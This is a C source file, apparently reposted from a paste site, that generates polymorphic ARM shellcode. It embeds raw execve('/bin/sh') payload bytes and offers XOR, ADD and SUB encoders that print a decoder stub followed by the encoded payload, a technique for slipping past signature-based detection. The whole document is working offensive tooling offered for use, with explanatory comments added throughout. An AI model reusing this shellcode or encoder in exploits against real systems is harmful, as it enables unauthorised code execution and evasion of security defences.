Scorz-Root

ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode

Dec 16th, 2017
  1. /*
  2. Title: Polymorphic shellcode generator for the ARM architecture
  3. Date: 2010-07-07
  4. Tested on: ARM926EJ-S rev 5 (v5l)
  5.  
  6. Author: Jonathan Salwan
  7. Web: http://shell-storm.org | http://twitter.com/jonathansalwan
  8.  
  9. ! Database of shellcodes http://www.shell-storm.org/shellcode/
  10.  
  11. Credit
  12. ======
  13. This code generates a polymorphic execve("/bin/sh", ["/bin/sh"], NULL) shellcode
  14. for the ARM architecture.
  15.  
  16. You can encode your shellcode with XOR, ADD or SUB.
  17. */
  18.  
  19.  
  20.  
  #include <errno.h>
  #include <stdio.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  23.  
  24. /* execve("/bin/sh", ["/bin/sh"], NULL); */
  25.  
  /*
   * Raw payload bytes that main() rewrites in place with the chosen
   * encoding. It is declared through a string literal, so sizeof your_SC
   * includes the implicit terminating '\0'; the encoder loop therefore
   * iterates over sizeof your_SC - 1 bytes. None of the bytes below is
   * 0x00, which is the only reason main()'s strlen(your_SC) agrees with
   * that sizeof-based length.
   */
  unsigned char your_SC[] =
      "\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
      "\x78\x46\x0a\x30\x01\x90\x01\xa9"
      "\x92\x1a\x0b\x27\x01\xdf\x2f\x2f"
      "\x62\x69\x6e\x2f\x73\x68";
  34.  
  35.  
  /*
   * Print the command-line usage to stdout and terminate the process with
   * exit status 1. This function never returns.
   */
  void syntax(void)
  {
      static const char *const usage_lines[] = {
          "\nSyntax: ./encode <type> <value>\n\n",
          "Type: -xor\n",
          " -add\n",
          " -sub\n\n",
          "Exemple: ./encode -xor 20\n\n",
      };

      /* None of the lines contains a conversion specifier, so fputs()
       * emits exactly the bytes fprintf() would have. */
      for (size_t i = 0; i < sizeof usage_lines / sizeof usage_lines[0]; i++) {
          fputs(usage_lines[i], stdout);
      }
      exit(1);
  }
  45.  
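  /* Byte-wise transformation applied to every payload byte. */
  enum encode_op { OP_XOR, OP_ADD, OP_SUB };

  /*
   * One command-line encoding mode. The three modes in the original
   * program were three near-identical branches whose only differences
   * were the option spelling, the printed label, a single byte of the
   * decoder-stub template and the arithmetic applied per byte; those four
   * differences are what this table captures.
   */
  struct encoder {
      const char *option;     /* argv[1] spelling, e.g. "-xor" */
      const char *label;      /* shown in the "Encode : <label> <value>" line */
      unsigned stub_op;       /* the one template byte that differs per mode */
      enum encode_op op;      /* per-byte transformation */
  };

  static const struct encoder encoders[] = {
      { "-xor", "XOR", 0x25, OP_XOR },
      { "-add", "ADD", 0x45, OP_ADD },
      { "-sub", "SUB", 0x85, OP_SUB },
  };

  /*
   * Decoder-stub template printed ahead of the encoded payload, as "\xNN"
   * text. The five %.2x slots receive, in order: the length-derived
   * counter, the same counter again, the key, the mode byte from
   * struct encoder, and counter + 1. Apart from the mode byte becoming a
   * slot, this is the template the original per-mode branches printed.
   * Kept as a macro so fprintf() still receives a string literal.
   */
  #define DECODER_STUB_FMT \
      "\\x24\\x60\\x8f\\xe2" \
      "\\x16\\xff\\x2f\\xe1" \
      "\\x%.2x\\x40\\xa0\\xe3" \
      "\\x01\\x0c\\x54\\xe3" \
      "\\x1e\\xff\\x2f\\x81" \
      "\\x%.2x\\x40\\x44\\xe2" \
      "\\x04\\x50\\xde\\xe7" \
      "\\x%.2x\\x50\\x%.2x\\xe2" \
      "\\x04\\x50\\xce\\xe7" \
      "\\x%.2x\\x40\\x84\\xe2" \
      "\\xf7\\xff\\xff\\xea" \
      "\\xf5\\xff\\xff\\xeb"

  /* Return the encoder whose option spelling equals @option, or NULL. */
  static const struct encoder *find_encoder(const char *option)
  {
      for (size_t i = 0; i < sizeof encoders / sizeof encoders[0]; i++) {
          if (strcmp(encoders[i].option, option) == 0) {
              return &encoders[i];
          }
      }
      return NULL;
  }

  /*
   * Parse @text as a decimal integer in 0..255 and store it in *key.
   * Returns 1 on success, 0 on any failure (no digits, trailing garbage,
   * overflow, or out of range). This replaces atoi(), which turned
   * non-numeric input into 0 without complaint and let negative or >255
   * values reach the "%.2x" slots of the stub, where they print more than
   * two hex digits and corrupt the \xNN byte text.
   */
  static int parse_key(const char *text, int *key)
  {
      char *end = NULL;
      errno = 0;
      long value = strtol(text, &end, 10);
      if (end == text || *end != '\0' || errno == ERANGE) {
          return 0;
      }
      if (value < 0 || value > 255) {
          return 0;
      }
      *key = (int)value;
      return 1;
  }

  /*
   * Apply one encoding step to a single payload byte. The arithmetic is
   * done in int and truncated back to unsigned char, exactly as the
   * original's "your_SC[i] = your_SC[i] op key" assignment did.
   */
  static unsigned char encode_byte(unsigned char byte, int key, enum encode_op op)
  {
      switch (op) {
      case OP_XOR:
          return (unsigned char)(byte ^ key);
      case OP_ADD:
          return (unsigned char)(byte + key);
      case OP_SUB:
          return (unsigned char)(byte - key);
      default:
          return byte;
      }
  }

  /*
   * Print the header lines, the decoder stub and the payload encoded with
   * @key, all on stdout. your_SC is encoded in place, as before.
   * @value_text is the user's spelling of the key, echoed in the first
   * line just as the original echoed argv[2].
   */
  static void emit_encoded(const struct encoder *enc, int key, const char *value_text)
  {
      /* sizeof counts the literal's '\0'; -1 is the payload length. The
       * original used strlen() here but sizeof-1 in the loop below, which
       * only agreed because the payload has no 0x00 byte; using one
       * definition for both keeps the stub's counter and the loop in step. */
      const size_t len = sizeof your_SC - 1;
      const unsigned num = (unsigned)(256 - len) + 1;
      const unsigned num2 = num + 1;

      fprintf(stdout, "Encode : %s %s\n", enc->label, value_text);
      fprintf(stdout, "Encoded: \n");
      fprintf(stdout, DECODER_STUB_FMT, num, num, (unsigned)key, enc->stub_op, num2);

      /* The key is parsed once up front instead of re-parsing argv[2]
       * on every iteration. */
      for (size_t i = 0; i < len; i++) {
          your_SC[i] = encode_byte(your_SC[i], key, enc->op);
          fprintf(stdout, "\\x%.2x", your_SC[i]);
      }
      fprintf(stdout, "\n");
  }

  /*
   * Entry point: ./encode <type> <value>.
   * Returns 0 after printing the encoded payload. An unrecognised <type>
   * or an invalid <value> is reported on stderr and yields exit status 1;
   * the original silently printed nothing and still returned 0 for an
   * unknown <type>.
   */
  int main(int argc, char *argv[])
  {
      if (argc != 3) {
          syntax();       /* prints usage and calls exit(1) */
          return 1;       /* not reached; kept as a defensive fallback */
      }

      const struct encoder *enc = find_encoder(argv[1]);
      if (enc == NULL) {
          fprintf(stderr, "Unknown type: %s\n", argv[1]);
          syntax();
          return 1;
      }

      int key = 0;
      if (!parse_key(argv[2], &key)) {
          fprintf(stderr, "Invalid value '%s': expected a decimal number 0-255\n", argv[2]);
          return 1;
      }

      emit_encoded(enc, key, argv[2]);
      return 0;
  }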